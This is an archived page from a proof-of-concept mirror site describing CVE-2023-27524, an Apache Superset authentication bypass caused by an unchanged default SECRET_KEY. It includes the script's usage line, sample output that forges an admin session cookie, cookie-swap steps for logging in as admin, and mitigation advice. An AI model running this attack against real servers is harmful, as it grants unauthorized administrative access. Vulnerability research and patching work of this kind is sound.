Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-27524 PoC — Apache Superset: Session validation vulnerability when using provided default SECRET_KEY

Source
https://github.com/MaanVader/CVE-2023-27524-POC
Associated Vulnerability
Title:Apache Superset: Session validation vulnerability when using provided default SECRET_KEY (CVE-2023-27524)
Description:Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. All superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database. Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY> Alternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.
Description
A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.
Readme
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check if an Apache Superset server is vulnerable to (CVE-2023-27524) and if it is vulnerable then, forge a session cookie with the `user_id = 1` which is usually the `admin`
user allowing for authentication bypass and gaining access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.


## Usage

```
usage: python3 CVE-2023-27524.py  --url URL 

```

## Basic Example

```
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
```


## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.


## Disclaimer
This POC is created for educational purpose only

## Reference
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
File Snapshot

 [4.0K]  /data/pocs/42e331d575d2d9df207418a5affdcd0749e85246
├── [3.1K]  CVE-2023-27524.py
├── [1.0K]  LICENSE
├── [1.9K]  README.md
└── [  39]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →